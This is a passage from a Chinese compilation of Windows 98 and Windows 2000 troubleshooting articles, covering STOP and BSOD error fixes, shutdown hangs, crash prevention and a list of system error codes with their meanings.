    4.如果系统配有SCSI适配卡，请向适配卡销售商索取最新的Windows2000驱动程序，禁用同步协商功能，检查终结头和设备的SCSI ID号。
    5.如果系统配有IDE设备，设IDE端口为Primary。检查IDE设备的Master/Slave/Only设置。除了硬盘，拆下其它所有的IDE设备。
    6.运行CHKDSK。如果Windows 2000不能启动CHKDSK，则必须把硬盘拆下并连接到另一个Windows2000系统上，然后用CHKDSK命令检查该硬盘。
    7.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x0000007F故障
通常原因 硬件或软件问题;常见的原因是硬件失效。
    1.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。这个STOP消息经常出现在错误或误配内存的情况下。
    2.在BIOS中禁用内存缓存功能。
    3.试着拆下或替换硬件:RAM、控制器、适配器、调制解调器和其它外围设备。
    4.检查Microsoft兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows2000兼容。这个问题可能是由于不兼容的主板引起的。
    5.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

返回


Windows 98关机死机原因及其排除方法

《一键清理系统垃圾》

Windows 98关机死机原因及其排除方法

   许多Windows 98用户都有这样的经历，正常运行的Windows 98系统突然无法正常关机，在出现“正在关机，
请等待（Please wait while your Computer shuts down）”的提示后，系统停止反应（挂起）；或者出
现有一个闪烁光标的空白屏幕。这时只好强行关掉电源。下一次开机时出现系统非正常关机的提示并运行
磁盘扫描程序。长此以往对系统将造成一定的损害。
一、关机过程及故障原因
Windows 98的关机程序执行下述各项功能：
完成所有磁盘写操作；
清除磁盘缓存；
执行关闭窗口程序关闭所有当前运行的程序；
将所有保护模式的驱动程序转换成实模式。
    它是系统关闭时必须执行的过程，而不是可有可无的。因此有出现关机故障，应尽可能找出故障的
原因，并解决它避免对系统造成更大的损害。引起Windows 98系统出现关机故障的主要原因可能是下列
之一：
没有在实模式下为视频卡分配一个IRQ；
某一个程序或TSR程序可能没有正确地关闭；
加载一个不兼容的、损坏的或冲突的设备驱动程序；
选择的退出Windows时的声音文件损坏；
不正确配置或损坏硬件；
BIOS配置的设置不相容；
在BIOS中的“高级电源管理”或“高级配置和电源接口”的设置不适当；
注册表中快速关机的键值设置为“使能（enabled）。
    注意： Windows 98第二版包括最新更新的“高级配置和电源接口 (ACPI)”, OnNow（即开即用）和高
级电源管理 (APM)。此外，为Windows 98最初版本开发的快速关机代码已被删除掉以支持这些新的特点。
尽管Windows 98第二版包括了许多新的驱动程序，但是并非所有的第三方硬件厂商都更新了他们的驱动程
序。有些计算机或设备需要BIOS或设备驱动程序以全面支持Windows 98第二版新功能。
二、解决办法
    采用下述方法可以确定引起Windows 98不能正常关机的原因：
●　检查所有正在运行的程序。包括关闭任何在实模式下加载的TSR程序、关闭开机时从启动组自动启动
的程序、关闭任何非系统引导必需的第三方设备驱动程序。
●　检查硬件配置。包括BIOS的设置、BIOS版本，将任何可能引起问题的硬件删除或使之失效。同时，向
相关的硬件厂商索取升级的驱动程序。
1、检查运行的程序
    使用Microsoft系统配置工具（Msconfig.exe，在c:\windows\system目录下，运行后如图所示）检查
有哪些运行的程序，对系统进行干净引导（指只加载最少的驱动程序、并在启动时不运行启动组中的任何
程序进行系统引导）。如果干净引导可以解决问题，你可以利用系统配置工具确定引起不能正常关机的
程序。
2、检查硬件
检查计算机的硬件配置，可以使用设备管理按下述步骤进行。
进入“控制面板”，双击“系统”图标。
在“设备管理”标签下，使下列分支下的所有设备无效：
显卡
软盘驱动器控制器
硬盘驱动器控制器
键盘
鼠标
网卡
PCMCIA插槽
端口
SCSI控制器
声音、视频和游戏控制器
可以采用下列步骤使设备管理器中的个设备无效：
双击包含你想选定的设备，单击该设备，然后单击属性。
在“常规”标签下，选定“在此硬件配置文件中禁用”复选框，然后单击“确定”。
重新引导系统
（3）如果问题解决，逐个启用在第二步中禁用的设备，并检查有没有设备冲突。按下列顺序逐个
启用设备：
COM端口
硬盘控制器
软盘控制器
其它设备
    启用在第二步中禁用的设备，并检查有没有设备冲突可按下述步骤进行：
在设备管理器中双击包含你想选定的设备，单击该设备，然后单击属性。
在“常规”标签下启用在第二步中禁用的设备。在“资源”标签下检查“冲突的设备列表”的内容。
注意，并非所有设备都有“资源”标签。
c) 单击“确定”然后重新启动系统。
    如果问题仍然没有解决，可以单击“开始>程序>附件>系统工具>系统信息”然后单击“工具”菜单，
单击“自动跳过驱动程序代理”工具以启用所有被禁用设备的驱动程序。
    如果通过上述步骤，确定了是某一个硬件引起非正常关机问题，应与该设备的代理商联系，以更新
驱动程序或固件（firmware，指更新升级flash ROM的内容）。
三、结论
    Windows 98非正常关机故障，在Windows 98系统中是极为常见现象，但往往被用户忽视了，并长期
使用不正常的方式进行关机，这将导致计算机系统一定程度的损害，影响系统的使用寿命。通过本文所
述的方法，找出Windows 98系统非正常关机的原因，并解决这个问题是十分必要的。此外，Windows 95
系统的非正常关机问题也可参照上述方法解决。


Windows 2000死机的应急处理

《一键清理系统垃圾》

Windows 2000死机的应急处理

    从理论上讲，纯32位的Windows 2000 是不会出现死机的，但是这仅仅是理论上的。病毒、硬件和硬件驱动程序不匹配等原因将造成Windows 2000的崩溃。当Windows 2000出现死机时，显示器屏幕将变为蓝色，然后出现stop故障提示信息。下面我们分别介绍通用的stop 故障处理方法和特殊stop故障排除。
    通用的STOP故障处理
    1.首先使用新版杀毒软件检查计算机上是否有病毒。
    2.如果Windows 2000 可以启动，请检查“事件查看器”中的信息，以确定导致故障的设备或驱动程序。启动“事件查看器”的方法是：打开“控制面板”，选择“管理工具”中的“事件查看器／系统日志”。
    3.如果不能启动计算机，试着用“安全模式”或“最后一次正确的配置”启动计算机，然后删除或禁用新安装的附加程序或驱动程序。如果用“安全模式”启动不了计算机，可使用修复控制台。修复控制台可以禁用一些服务、重新命名设备驱动程序、检查引导扇区或主引导记录。
    4.拆下新安装的硬件设备（RAM、适配卡、硬盘、调制解调器等等）。
    5.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    6.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    7.检查Microsoft 兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows 2000兼容。Hcl.txt在Windows 2000CD—ROM的\support文件夹中。
    8.在BIOS中禁用内存缓存功能。
    9.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。（注：使用“最后一次正确的配置”的方式启动计算机，计算机的所有设置被重置为最后一次成功启动时的配置。）
    10.如果能够访问Web，进入http:／／www.microsoft.com／ntserver／，单击“Support／Serach Knowledge Base”，在“Type your keyword here”处，输入“stop”和相应的号码（如出现STOP消息“stop:0x0000000A”，可在此输入“stop0x0000000A”），按Enter键，就可以找出所出问题的解决办法。
    特殊STOP故障排除
    STOP消息：0X0000000A故障（设备已安装）
    通常原因：驱动程序使用了不正常的内存地址。
    1.如果Windows 2000 可以启动，请检查“事件查看器”中的信息，以确定导致故障的设备或驱动程序。
    2.关掉或禁用一些新安装的驱动程序，并删除新安装的附加程序。
    3.拆下新安装的硬件设备（RAM、适配卡、硬盘、调制解调器等等）。
    4.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    5.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    6.检查Microsoft 兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows 2000兼容。
    7.在BIOS中禁用内存缓存功能。
    8.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。
    STOP消息：0X0000000A故障（刚加入新设备时）
    通常原因： 驱动程序使用了不正常的内存地址
    1.在安装过程中，屏幕上提示“安装程序正在检查计算机硬件配置”时，按F5，根据提示选择合适的计算机类型。例如，计算机是单处理器，请选择“标准PC”。
    2.在BIOS中禁用内存缓存功能。
    3.拆下所有适配卡，并断开所有不是启动计算机所必需的硬件设备，再重新安装Windows 2000。
    4.如果系统配有SCSI卡，请向适配卡销售商索取最新的Windows 2000驱动程序，禁用同步协商功能，检查终结头和设备的SCSI ID 号。
    5.如果系统配有IDE设备，设IDE端口为Primary。检查IDE设备的Master／Slave／Only设置。除了硬盘，拆下其它所有的IDE设备。
    6.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    7.检查Microsoft 兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows 2000兼容。
    8.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。
    STOP消息：0x0000001E故障
    1.检查是否有充分的磁盘空间，尤其是新安装。
    2.禁用STOP消息中显示的驱动程序和所有新安装的驱动程序。
    3.如果所使用的视频驱动程序不是Microsof提供的，试着切换到标准VGA驱动程序或者由Windows 2000支持的合适的驱动程序。
    4.确保系统有最新的BIOS。
    5.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。
    STOP消息：0x00000023和0x00000024故障
    通常原因:严重的驱动程序碎片、超载的文件I／O、第三方的驱动程序镜向软件或者一些防毒软件出错。
    1.禁用一些防毒软件或者备份程序，禁用所有碎片整理应用程序。
    2.运行CHKDSK／f检修硬盘驱动器，然后重新启动计算机。
    3.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。
    STOP消息：0X0000002E故障
    通常原因：系统内存中的奇偶校验错误。
    1.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    2.在BIOS中禁用内存缓存功能。
    3.试着用“安全模式”启动。如果“安全模式”可启动计算机，试着更改为标准VGA驱动程序。如果这不能解决问题，可能须要用另外的视频适配卡，“兼容硬件列表”中列出了兼容的视频适配卡。
    4.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    5.拆下新安装的硬件设备（RAM、适配卡、硬盘、调制解调器等等）。
    6.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。
    STOP消息：0X0000003F故障
    通常原因：驱动程序没有被完全清除。
    删除一些新安装的软件，包括备份工具或磁盘工具，例如碎片整理和防病毒软件。
    STOP消息：0X00000058故障
    通常原因：在容错集的主驱动器中发生错误。
    1.用Windows 2000引导软盘，从镜像（第二个）系统驱动器启动计算机。
    2.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。
    STOP消息：0X0000007B故障
    通常原因：在I／O系统的初始化过程中问题（通常是引导驱动器或文件系统）。
    1.检查计算机上是否有病毒。这个STOP消息通常在引导扇区有病毒时出现。
    2.使用“修复控制台”来修复驱动器。
    3.拆下新安装的硬盘驱动器或控制卡。
    4.如果系统配有SCSI卡，请向适配卡销售商索取最新的Windows 2000驱动程序，禁用同步协商功能，检查终结头和设备的SCSI ID 号。
    5.如果系统配有IDE设备，设IDE端口为Primary。检查IDE设备的Master／Slave／Only设置。除了硬盘，拆下其它所有的IDE设备。
    6.运行CHKDSK。如果Windows 2000不能启动CHKDSK，则必须把硬盘拆下并连接到另一个Windows 2000系统上，然后用CHKDSK命令检查该硬盘。


Windows 2000中蓝屏死机之停止信息分析

《一键清理系统垃圾》

Windows 2000中蓝屏死机之停止信息分析

Win2000也许可以说得上是一个划时代的操作系统，但是它仍然不能够避免蓝屏死机（Blue S
creen of Death）问题。本文的目的是解刨BSOD问题，同时给出如何处理一般的蓝屏问题的解
决步骤。
    简介
    什么是蓝屏死机（BSOD）问题？
    BSOD就是显示在蓝色屏幕背景下的出错信息。一般这种出错信息严重到你的整个操作系统
当机，你只有重新冷启动的选择。
    停止消息和硬件消息
    Win2000的BSOD和NT4以前的BSOD消息是完全不同的。最大的不同就是NT中的BSOD只包含一
个通用的停止消息类型(就是实际的出错代码), 但是Win2000的BSOD包含有两种消息类型：停
止消息和硬件消息。停止消息是指，当win2000的内核发现一个它不能够恢复的软件错误时候
产生的错误消息。硬件消息是指，当Win2000发现一个严重的硬件冲突时产生的错误消息。
    刨析BSOD
    BSOD可以分成独立的几部分，每部分包含有有价值的错误处理信息。这几部分包括：
    1、bug检查部分：这是BSOD中包含实际出错消息的位置。在这部分中，你应该注意的是出
错代码（就是在单词“Stop”后面的十六进制数字）和错误符号（就是紧跟在出错代码后的单
词）
    2、推荐用户采取行动部分：这部分经常包含一些一般的指导你如何纠正错误的步骤
的消息。
    3、调试端口信息部分：这部分包含有你应该如何设置你的内核调试器的信息。内核调试
器是让你可以通过手工连接到计算机并对进程进行调试的工具。
    停止信息的四种类型
    当程序或则驱动程序发生了一个不能够控制的错误消息或则试图执行一个非法指令时，系
统就会发生停止出错信息。而这种信息通常由四种类型组成。
    1、常规停止消息：在正常的使用win2000时发生的停止消息
    2、安装停止消息：在安装win2000过程中的停止消息，通常由你的系统中存在和2000不兼
容的硬件设备引起的。
    3、可执行程序安装停止消息：表示发生在2000安装过程中第4个阶段（执行程序部分）的
停止消息。
    4、软件陷阱停止消息：由于软件中的错误陷阱并且当程序试图执行一个非法指令的时候
发生的停止消息。
    不管win2000是否迄今为止最伟大的操作系统与否，它不可能是没有错误的。至少我们知
道在2000中，BSOD还是存在的。下面是有关它的更详细的描述：
    下面是一个具体的BSOD例子：
*** Stop: 0x0000001E (0xF24A447A, 0X00000001, 0X0000000)
KMODE_EXCEPTION_NOT_HANDLED
*** Address F24A447A base at f24A0000, DateStamp 35825ef8d - wdmaud.sys
If this is the first time you''ve seen this Stop error screen, restart your comput
er.
If this screen appears again, follow these steps:
Check to be sure you have adequate disk space. If a driver is identified in the
Stop message, disable the driver or check with the manufacturer for driver update
s.
Try changing video adapters.
Check with your hardware vendor for any BIOS updates. Disable BIOS memory options

such as caching or shadowing. If you need to use Safe Mode to remove or disable
components, restart your computer, press F8 to select Advanced Startup Options,
and then select Safe Mode.
Refer to your Getting Started manual for more information on troubleshooting Stop
errors.
Kernel Debugger Using: COM2 (Port 0x2f8, Baud Rate 19200)
Beginning dump of physical memory
Physical memory dump complete. Contact your system administrator or technical sup
port group.
    根据这个具体的例子，按照上面刨析的BSOD四个部分，下面一一介绍：
bug检查部分：
    这是BSOD中包含实际出错消息的位置。它看上去就是下面的代码：
*** Stop: 0x0000001E (0xF24A447A, 0X00000001, 0X0000000)
KMODE_EXCEPTION_NOT_HANDLED *** Address F24A447A base at f24A0000, DateStamp 3582
5ef8d - wdmaud.sys
    其中错误代码是一个紧跟在Stop后面的十六进制数，在这里面它由其它四个数字组成。

    而错误符号是指紧随其后的KMODE_EXCEPTION_NOT_HANDLED.
    在一些BSOD出错信息中，一个内存位置和文件名出现在错误符号的后面。这个信息告诉了
当错误发生的时候在内存中的位置和哪个文件导致了错误的发生。当然你是否能够看到该信息
是由哪种停止消息类型来决定的。在一些实际运用中，你只能够看到上面的第一行。而这里通
常是表示由显示服务中导致的问题。 推荐用户采取行动部分：
    在上面的例子中推荐用户采取行动部分如下：
If this is the first time you''ve seen this Stop error screen, restart your comput
er. If this screen appears again, follow these steps:
Check to be sure you have adequate disk space. If a driver is identified in the S
top message, disable the driver or check with the manufacturer for driver updates
. Try changing video adapters.
Check with your hardware vendor for any BIOS updates. Disable BIOS memory options
such as caching or shadowing. If you need to use Safe Mode to remove or disable
components, restart your computer, press F8 to select Advanced Startup Options, a
nd then select Safe Mode.
Refer to your Getting Started manual for more information on troubleshooting Stop
errors.
    推荐用户采取行动部分通常是推荐用户在遇到了出错信息后应该采取的解决步骤。在消息
中可以看到，解决一个BSOD也许只要重新启动或则整理出足够大的剩余空间就能够解决了。尽
管这样的方法偶尔会起到作用，但是实际上要解决BSOD经常要远远复杂得多。
    调试端口信息部分：
    这部分包含有你应该如何设置你的内核调试器的信息。我会在以后的网站里面详细介绍什
么是2000的内核调试器。在上面的例子中，这部分内容是：
Kernel Debugger Using: COM2 (Port 0x2f8, Baud Rate 19200)
Beginning dump of physical memory Physical memory dump complete. Contact your sys
tem administrator or technical support group.
    停止信息的四种类型
    常规停止消息：
    常规停止消息通常是最难解决的出错信息，因为有可能有无数的原因能够导致错误的发生
。
    安装停止消息：
    在安装win2000过程中的停止消息，通常由你的系统中存在有没有列在2000硬件兼容列表
中的设备。
    解决办法是你查看系统中的硬件设备，找到没有列出在2000兼容列表中的设备。然后和你
的硬件设备厂商联系看他们是否能够给你提供该设备的驱动程序。如果他们不能，那你只好从
你的系统中删除该设备，并用其它的可以兼容的设备替换掉。
    如果你的所有硬件都是兼容的，你也许是存在有两个互相冲突的硬件设备。要解决这个问
题，先移走任何不是必要的硬件设备，然后重新装载2000，一旦2000装载成功后，把所有移走
的设备全部重新加入到系统中。这样做，通常能够解决这个问题，至少能够告诉你哪些硬件是
有冲突的。
    可执行程序安装停止消息：
    安装2000在可执行程序的安装过程中有两个阶段。第一个阶段是禁止硬件中断同时装载一
些基本的组件，例如硬件提取层。第二个阶段是初始化你系统中所有的硬件。如果你在安装程
序到了这个阶段的时候收到了停止消息错误。需要再次运行诊断程序，来判断你的硬件是否都
工作正常。然后重新安装2000。如果你仍然遇到这个出错消息，那么就需要和微软技术支持部
打交道了。
    软件陷阱停止消息：
    由于软件中的错误陷阱并且当程序试图执行一个非法指令的时候发生的停止消息。例如，
程序试图向一个本来是保存数字的变量写字符串的时候，这个错误就有可能发生。如果你遇到
了这种类型的错误，需要记下出错信息，是什么软件导致了错误，一般这些软件都有新的版本
来纠正这些错误的。
    解决问题的技巧下面是当你遇到了停止消息时候可能需要的解决步骤：
    首先判断你最近是不是在系统中有任何的变动。如果你有，那么这些变动经常是问题产生
的根源。试图删除或者移走新的硬件或软件，看是否能够解决问题。检查系统中的硬件，最好
如果有硬件检测程序的话，可以运行该程序进行检测，同时重新插放你的内存卡和扩展卡。

    如果你的停止信息是发生在启动中或刚启动的过程中，那么这有可能是你的某个服务或则
设备驱动程序中的问题。可以尝试将机器启动到安全模式。如果你的2000系统能够启动成功安
全模式，那么表示你的猜测是正确的。
    同时要确保你的防病毒程序是设计成和win2000兼容的，并且随时保持更新。如果错误仍
然发生，那么进入你的CMOS设置，禁止掉BIOS中的象缓存或则shadow之类的选项，然后重新启
动。


Windows 死机的简单预防

《一键清理系统垃圾》

Windows 死机的简单预防

对于Windows9X，相信很多朋友已经使用了好长一段时间了，当然也都曾遇到过死机的问题。
那么，Windows9X为什么会经常死机呢？这可就得从Windows9X对内存的管理和使用谈起了。

    我们知道，Windows9X是一个16/32位混合的操作系统，对内存具有32位寻址能力，可以发
挥80386以上CPU所具有的保护模式功能，为每个应用程序提供独立的4GB地址空间。Windows9
X利用CPU的虚拟内存能力，把硬盘的一部分当作内存(硬盘交换文件)来使用，即通常所说的虚
拟内存。现在很多用户配置的硬盘容量越来越大，这下似乎就有了用不完的内存，就以为不会
发生内存不够的情况了。其实不然，首先，能作虚拟内存的必须是硬盘上的剩余空间，而且这
些被分为若干块的空间的连续长度必须是512K的整数倍，才能被用作虚拟内存。第二，CPU在
RAM存取数据的速度要远远快于RAM与硬盘交换数据的速度。这样，有时就会发生应用程序存取
当前不在RAM中而在交换文件中的数据的情况，当应用程序发现存取数据的地址或者将要跳转
到的地址根本就没有分配RAM或是虚拟内存时(即出现页面无效)，Windows9X就会显示“异常错
误发生......”，并提示用户中止程序运行。

    引起该错误的原因有很多，相应的也有不同的处理方法：

    1、CPU超频：

    CPU超频使用的是最大缺点就是令CPU的温度过热而导致其性能的不稳定。这种情况在炎热
的夏季来临后会变得更加明显。由于CPU在RAM存取数据的速度本来就快于RAM与硬盘交换数据
的速度，超频使这种矛盾更加突出。解决办法：回归自然，使CPU工作在规定的正常频率，同
时使用“降温”软件，并采取加大或是清扫CPU风扇等措施。

    2、硬盘剩余空间太少或碎片太多：

    硬盘如果经常删除文件会使文件碎片增多，有些人从购机后用了几年也没有作过一次硬盘
碎片整理工作，这时系统运行速度会随之变慢。前面已经谈到，硬盘上能作虚拟内存的必须是
自由空间，而且空间连续长度必须是512K的整数倍。如果现在你的硬盘还只有几百MB，出现“
异常错误”与此很可能有关。解决办法：用Windows9X本身自带的硬盘碎片整理程序对硬盘作
一次的整理（这种办法需要的时间较长，你也可以使用外挂的程序，如Norton的Speed Disk等
）。

    3、启动时加挂的程序过多：

    这会使系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现
异常错误。解决办法：不要同时启动过多的程序，如果已经发生“异常错误”，只需重新启动
系统就正常了。

    4、系统冲突：

    经常遇到的是由于声卡或显示卡的设置冲突，引起异常错误。此外，其它设备的中断、D
MA或端口出现冲突的话，也可能导致少数驱动程序产生异常，甚至无法正常启动Windows9X。
解决办法：以“安全模式”启动，在“控制面板-系统-设备管理”中进行适当调整，一般可以
解决。

    5、版本冲突：

    多数应用程序都要调用特定版本的动态链接库DLL或者OLE组件，如果在安装某个软件时，
旧版本的DLL覆盖了新版本的DLL，或者删除应用程序时，误删了有用的DLL文件，就可能使上
述调用失败，从而引起“异常错误”。这种情况最简单的方法就是重装Windows。当然如果你
对系统比较了解的话，你可在Windows9X的系统文件中把出错的DLL文件恢复即可。

    6、注册表错误：

    注册表是Windows9X的“命根子”，其中保存有Windows9X以及应用程序的重要数据，即使
是哪个细小地方出了问题，都很可能引发“致命异常错误”的发生。如果你在出错之前已经对
注册表文件进行了备份，那你只需用备份文件覆盖即可。如果没有备份，你可得重装系统了。

    7、程序设计问题：

    部分程序在编制时内存分配不合理，完成后又未经过严格测试，在特殊的运行条件下就会
因找不到内存分配地址而频频出错。还有一种情况是，盗版软件因解密过程中破坏、丢失了部
分源代码，也常常导致“异常错误”的发生。因此，还是用正版软件的好。

    8、软硬件不兼容:

    经常遇到的是，BIOS或驱动程序太旧，以致不能很好支持硬件，导致“异常错误”的发生
。如果你的主板支持BIOS升级，尽量升级到最新版本，同样，尽量找到与你设备配套的最新的
设备驱动程序，也可以尽量减少错误的发生。

    9、硬件老化或存在故障：

    很多人都有一部以上的电脑，而且为了物尽用，会经常把旧的硬盘和新的硬盘放在同一电
脑中使用。但你可知道，那些旧硬盘转速很慢，有些仅为3600转/分钟左右，如果用高频CPU运
作，就等于快马拉破车，出现“异常错误”的可能性自然较大。解决办法也很简单，你只需把
旧硬盘从你的电脑上拆下来就可以了。

    如果以上几种的情况都不能解决，我想你最好删除原有的系统并重装算了，当然你应该作
好相应备份啦。


Windows错误代码大全

《一键清理系统垃圾》

Windows错误代码大全

[color=Red]当你遇到windows错误时，只要打开查询我们的手册，立马能知道是哪类错误，能利于针对解决问题！[/color]

[color=Blue]0000 操作已成功完成。
0001 错误的函数。
0002 系统找不到指定的文件。
0003 系统找不到指定的路径。
0004 系统无法打开文件。
0005 拒绝访问。
0006 句柄无效。
0007 存储区控制块已损坏。
0008 可用的存储区不足，无法执行该命令。
0009 存储区控制块地址无效。
0010 环境错误。

0011 试图使用不正确的格式加载程序。
0012 访问代码无效。
0013 数据无效。
0014 可用的存储区不足，无法完成该操作。
0015 系统找不到指定的驱动器。
0016 无法删除该目录。
0017 系统无法将文件移到其他磁盘驱动器上。
0018 没有其他文件。
0019 媒体写保护。
0020 系统找不到指定的设备。

0021 设备尚未准备好。
0022 设备无法识别该命令。
0023 数据错误（循环冗余检查）。
0024 程序发出命令，但是该命令的长度错误。
0025 驱动器在磁盘上无法定位指定的区域或磁道。
0026 无法访问指定的磁盘或软盘。
0027 驱动器找不到所请求的扇区。
0028 打印机缺纸。
0029 系统无法写入指定的设备。
0030 系统无法读取指定的设备。

0031 与系统连接的设备不能正常运转。
0032 其他进程正使用该文件，因此现在无法访问。
0033 另一进程已锁定该文件的某一部分，因此现在无法访问。
0034 驱动器中的软盘不正确。请将 %2 （卷标序列号: %3）插入驱动器 %1。
0036 打开共享的文件太多。
0038 已到达文件结尾。
0039 磁盘已满。
0050 不支持此网络请求。

0051 远程计算机无法使用。
0052 网络中存在重名。
0053 找不到网络路径。
0054 网络正忙。
0055 指定的网络资源或设备已不可用。
0056 已经达到网络命令的极限。
0057 网络适配器出现错误。
0058 指定的服务器无法执行所请求的操作。
0059 网络出现意外错误。
0060 远程适配器不兼容。

0061 打印机队列已满。
0062 服务器上没有存储等待打印的文件的空间。
0063 已经删除等候打印的文件。
0064 指定的网络名无法使用。
0065 拒绝访问网络。
0066 网络资源类型错误。
0067 找不到网络名。
0068 已超过本地计算机网络适配器卡的名称极限。
0069 已超过网络 BIOS 会话的极限。
0070 远程服务器已经暂停或者正在启动过程中。

0071 由于该计算机的连接数目已达到上限，此时无法再连接到该远程计算机。
0072 指定的打印机或磁盘设备已经暂停。
0080 该文件存在。
0082 无法创建该目录或文件。
0083 INT 24 失败。
0084 处理该请求的存储区不可用。
0085 正在使用该本地设备名。
0086 指定的网络密码不正确。
0087 参数错误。
0088 网络出现写入错误。
0089 此时系统无法启动其他进程。
0100 无法创建其他系统标志。

0101 属于其他进程的专用标志。
0102 标志已经设置，无法关闭。
0103 无法再次设置该标志。
0104 中断时无法请求专用标志。
0105 此标志先前的所有权已终止。
0106 请将软盘插入驱动器 %1。
0107 后续软盘尚未插入，程序停止。
0108 磁盘正在使用或已由其他进程锁定。
0109 管道已经结束。
0110 系统无法打开指定的设备或文件。

0111 文件名太长。
0112 磁盘空间不足。
0113 没有其他可用的内部文件标识符。
0114 目标内部文件标识符不正确。
0117 该应用程序所运行的 IOCTL 调用不正确。
0118 校验写入的开关参数值不正确。
0119 系统不支持所请求的命令。
0120 该系统上不支持此功能。

0121 标记已超时。
0123 文件名、目录名或卷标语法错误。
0124 系统调用层不正确。
0125 磁盘没有卷标。
0126 找不到指定的模块。
0127 找不到指定的过程。
0128 没有要等候的子进程。
0129 模式下运行。
0130 试图使用操作(而非原始磁盘I/O)的已打开磁盘分区的文件句柄。

0131 试图将文件指针移至文件开头之前。
0132 无法在指定的设备或文件中设置文件指针。
0133 对于包含已连接驱动器的驱动器，不能使用 JOIN 或 SUBST 命令。
0134 试图在已经连接的驱动器上使用 JOIN 或 SUBST 命令。
0135 试图在已经替换的驱动器上使用 JOIN 或 SUBST 命令。
0136 系统试图删除尚未连接的驱动器的 JOIN。
0137 系统试图删除尚未替换的驱动器的替换项。
0138 系统试图将驱动器连接到已连接的驱动器下的目录。
0139 系统试图将驱动器替换成已替换的驱动器下的目录。
0140 系统试图将驱动器连接到已替换的驱动器的一个目录中。

0141 系统试图将驱动器替换成到已连接的驱动器下的目录。
0142 此时系统无法运行 JOIN 或 SUBST。
0143 系统无法将驱动器连接到或替换成同一驱动器下的目录。
0144 此目录不是该根目录的子目录。
0145 该目录未清空。
0146 指定的路径已经在替换中使用。
0147 资源不足，无法执行该命令。
0148 此时无法使用指定的路径。
0149 试图连接或替换某个驱动器目录，该驱动器上的某个目录是上一次替换的目标目录。
0150 CONFIG.SYS 文件未指定系统跟踪信息，或禁止跟踪。

0151 DosMuxSemWait 的指定信号事件的数目不正确。
0152 DosMuxSemWait 没有运行；已经设置太多的标志。
0153 DosMuxSemWait 列表不正确。
0154 输入的卷标超过目标文件系统的标号字符长度极限。
0155 无法创建其他线程。
0156 接收进程拒绝该信号。
0157 已经放弃该区域，因此无法锁定。
0158 该区域已经解除锁定。
0159 线程标识符的地址错误。
0160 传到 DosExecPgm 的参数字符串错误。

0161 指定的路径无效。
0162 信号已挂起。
0164 系统无法创建其他线程。
0167 无法锁定文件的范围。
0170 所要求的资源正在使用中。
0173 锁定请求对于提供的取消区域不重要。
0174 文件系统不支持到锁定类型的自动更改。
0180 系统检测到错误的区域号码。

0182 操作系统无法运行 %1。
0183 不能创建已经存在的文件。
0186 传送的标志不正确。
0187 找不到指定的系统信号名称。
0188 操作系统无法运行 %1。
0189 操作系统无法运行 %1。
0190 操作系统无法运行 %1。

0191 无法在 Win32 模式下运行 %1。
0192 操作系统无法运行 %1。
0193 %1 不是有效的 Win32 应用程序。
0194 操作系统无法运行 %1。
0195 操作系统无法运行 %1。
0196 操作系统无法运行此应用程序。
0197 当前无法配置操作系统运行此应用程序。
0198 操作系统无法运行 %1。
0199 操作系统无法运行此应用程序。
0200 代码段应小于 64K。

0201 操作系统无法运行 %1。
0202 操作系统无法运行 %1。
0203 系统找不到输入的环境选项。
0205 在命令子树中的进程没有信号句柄。
0206 文件名或扩展名太长。
0207 环 2 堆栈正在使用中。
0208 输入的全局文件名字符 * 或 ? 不正确，或指定的全局文件名字符太多。
0209 所发送的信号不正确。
0210 无法设置信号处理程序。

0212 区域已锁定，无法重新分配。
0214 附加到此程序或动态链接模块的动态链接模块太多。
0215 无法嵌套调用 LoadModule。
0216 图像文件 %1 有效，但不适用于本机类型。
0230 管道状态无效。
0231 所有的管道实例都处于忙状态。
0232 管道正在关闭。
0233 在管道的另一端没有进程。
0234 有更多可用的数据。
0240 已取消会话。

0254 指定的扩展属性名无效。
0255 扩展属性不一致。
0258 等待操作过时。
0259 没有其他可用数据。
0266 无法使用复制功能。
0267 目录名无效。
0275 扩展属性不匹配缓冲区。
0276 所装载的文件系统上的扩展属性文件已被损坏。
0277 扩展属性表格文件已满。
0278 指定的扩展属性句柄无效。

0282 安装的文件系统不支持扩展属性。
0288 试图释放不属于调用者的多路同步信号。
0298 信号投递的次数太多。
0299 仅完成部分 ReadProcessMemory 或 WriteProcessMemory 请求。
0300 操作锁定请求被拒绝。
0301 系统接收了一个无效的操作锁定确认。
0317 在 %2 的消息文件中，系统无法找到消息号为 0x%1 的消息文本。
0487 试图访问无效地址。
0534 运算结果超过 32 位。
0535 该管道的另一方有一进程。
0536 等候进程打开管道的另一端。

0994 拒绝对扩展属性的访问。
0995 由于线程退出或应用程序的要求，I/O 操作异常终止。
0996 重叠的 I/O 事件不处于已标记状态。
0997 正在处理重叠的 I/O 操作。
0998 对内存位置的无效访问。
0999 执行页内操作出错。

1001 递归太深；堆栈溢出。
1002 窗口无法用来发送消息。
1003 无法完成此项功能。
1004 标志无效。
1005 卷不包含已识别的文件系统。请确认所有需要的文件系统驱动程序都已经加载，而且卷没有任何损坏。
